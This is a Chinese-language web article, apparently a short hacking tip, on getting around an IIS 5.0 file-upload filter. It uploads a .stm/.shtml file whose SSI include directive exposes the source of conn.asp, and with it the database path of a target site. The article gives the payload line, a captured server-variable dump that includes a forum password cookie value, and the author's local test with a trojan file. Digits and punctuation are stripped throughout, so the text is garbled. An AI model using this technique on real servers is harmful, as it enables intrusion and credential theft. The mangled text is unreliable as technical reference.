网络安全

位置:IT落伍者 >> 网络安全 >> 浏览文章

解决IIS5.0不能上传asp等文件


发布日期:2023年02月24日
 
解决IIS5.0不能上传asp等文件

利用stm来上传还能执行程序代码说保存为stm或者shtml看看运行如下:

HTTP_ACCEPT:image/gif image/xxbitmap image/jpeg image/pjpeg application/xshockwaveflash application/vndmspowerpoint application/vndmsexcel application/msword */* HTTP_ACCEPT_LANGUAGE:zhcn HTTP_CONNECTION:KeepAlive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/ (compatible; MSIE ; Windows NT ; Maxthon; NET CLR ) HTTP_COOKIE:nbblastactivity=; bblastvisit=; bblastactivity=; bbuserid=; bbpassword=fdedeaafbaafcf; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip deflate 当前文件名称:F:Webstm

Web服务器的名称和版本:MicrosoftIIS/主机名:localhost端口:客户或客户代理IP地址:客户或客户代理主机名:PATH_INFO 的值但带有扩展为某个目录规范的虚拟路径:F:Webstm客户端给出附加路径信息:/stmimage/gif image/xxbitmap image/jpeg image/pjpeg application/xshockwaveflash application/vndmspowerpoint application/vndmsexcel application/msword */*

Quoted from Unkown:

当网站不允许上传asp cer cdx htr等文件时 上传一个stm文件 内容为:

<!#include file=connasp>

直接请求这个stm文件 connasp就一览无遗 数据库路径也就到手啦原来就是如上所说的

<!#include file=connasp>

就是一条SSI指令其作用是将的内容拷贝到当前的页面中当访问者来浏览时会看到其它HTML文档一样显示其中的内容我在本地试验成功!在我的iis目录下建了一个teststm文件内容为

<!#include file=connasp>

又在同一目录下放了一个我的一个木马文件okasp在浏览器中请求teststm没有什么反映一片空白但是一查看源代码狂晕原来就是我的asp文件的内容!这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径但是一个前提是服务器的对stm或者shtml的扩展没有删除!

上一篇:windows下ftp命令大全

下一篇:禁止局域网访问